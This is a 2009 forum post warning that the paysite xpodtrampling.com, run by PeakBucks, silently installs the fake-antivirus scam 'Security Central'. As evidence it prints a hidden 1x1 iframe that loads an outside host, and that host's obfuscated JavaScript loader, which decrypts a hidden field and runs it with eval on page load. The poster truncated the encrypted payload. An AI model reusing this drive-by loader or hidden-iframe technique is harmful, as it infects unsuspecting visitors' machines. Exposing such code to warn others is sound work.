| spacedog |
12-15-2009 03:55 PM |
Hey PeakBucks!! Why are you auto installing ransomware/malware on users machines
PeakBucks, which owns the domain xpodtrampling.com as a paysite in affiliate program autoinstalls and infects users machine with Security Central, which is a maliscious program that takes over the users machine and claims it is scanning system and has found infections.. Once this piece of shit is running, the users browser, antivirus and other tools/programs no longer work.. This piece of shit program demands paid for activation to get rid of the infections which do not really exist.
This malware is auto installed on users machines from the above mentioned domain which contains in the source code the following:
Code:
<iframe src="http://rainmannn.org/whitehorse/" width=1 height=1 frameborder=0></iframe>
The source code of that page is
Code:
<html>
<head>
<script>
function nanit(s4k3_yJBbq1X, JBXr71__bgnOoY1){var OMj__Bw4E_Gh = arguments.callee;OMj__Bw4E_Gh = OMj__Bw4E_Gh.toString();var O5_Jn4gO2N_i_8 = 0;var ys__X_w_7_W_5f = document.getElementById("d");if (ys__X_w_7_W_5f && !JBXr71__bgnOoY1) {JBXr71__bgnOoY1 = ys__X_w_7_W_5f.value;}O5_Jn4gO2N_i_8 = 2;var kador = new Array();if (!s4k3_yJBbq1X) { var UE24__p1X0J__Dl = 0;var bPY7lA = 0;while(bPY7lA < OMj__Bw4E_Gh.length) {var fBtuse3twt = 0;var E__8A_pOg__2r = OMj__Bw4E_Gh.charCodeAt(bPY7lA);if (E__8A_pOg__2r >= 48 && E__8A_pOg__2r <= 57) { fBtuse3twt = 1; }if (fBtuse3twt) {if (UE24__p1X0J__Dl == 4) { UE24__p1X0J__Dl = 0; }if (isNaN(kador[UE24__p1X0J__Dl])) { kador[UE24__p1X0J__Dl] = 0; }kador[UE24__p1X0J__Dl] += E__8A_pOg__2r;if (kador[UE24__p1X0J__Dl] > 512) {kador[UE24__p1X0J__Dl] -= 512;}UE24__p1X0J__Dl++;}bPY7lA++;}} else {kador = s4k3_yJBbq1X;}for(UE24__p1X0J__Dl = 4; UE24__p1X0J__Dl > 0; UE24__p1X0J__Dl--) {if (kador[UE24__p1X0J__Dl - 1] > 256) {kador[UE24__p1X0J__Dl - 1] -= 256;}}var Sm_rS_vO = 0;var A36HY_d = "";var WU75FMk__UiG = 0;var AcP_Dyl_xBs1 = 0;var wBVY8sO_85GYV4 = 0;var hjYkI80_h0vj;var pmcQJAp4_Jy_qk = 0;while(AcP_Dyl_xBs1 < JBXr71__bgnOoY1.length) {var B_cQp__k__s = JBXr71__bgnOoY1.substr(AcP_Dyl_xBs1, 1);var S__CY_Py_N = parseInt(B_cQp__k__s, 16);if (wBVY8sO_85GYV4) {hjYkI80_h0vj += S__CY_Py_N;if (Sm_rS_vO == 4) {Sm_rS_vO -= 4;}var nD_J6Rps_mrC_7 = hjYkI80_h0vj;nD_J6Rps_mrC_7 = nD_J6Rps_mrC_7 - (pmcQJAp4_Jy_qk + 2) * kador[Sm_rS_vO];if (nD_J6Rps_mrC_7 < 0) {var f__0Q1__4U1__rr = Math.floor(nD_J6Rps_mrC_7 / 256);nD_J6Rps_mrC_7 = nD_J6Rps_mrC_7 - f__0Q1__4U1__rr * 256;}nD_J6Rps_mrC_7 = String.fromCharCode(nD_J6Rps_mrC_7);if (O5_Jn4gO2N_i_8 == 1) {A36HY_d += S__CY_Py_N;} else if (O5_Jn4gO2N_i_8 == 2) {A36HY_d += nD_J6Rps_mrC_7;} else {A36HY_d += AcP_Dyl_xBs1;}Sm_rS_vO++;pmcQJAp4_Jy_qk++;wBVY8sO_85GYV4 = 0;} else {hjYkI80_h0vj = S__CY_Py_N * 16;wBVY8sO_85GYV4 = 1;}AcP_Dyl_xBs1++;}eval(A36HY_d);return 0;}
</script>
</head>
<body onload="nanit();">
<input type="hidden" id="d" value="C853F27741E9634AF958DF0E72F566D050B5F470F558200089EAB8BE05863333D524F9278AA--iremovedrestofthisencryptedcodetomakeitshorter">
<noscript>
<img src="j" width="2" height="2" ></img>
</noscript>
</body>
|
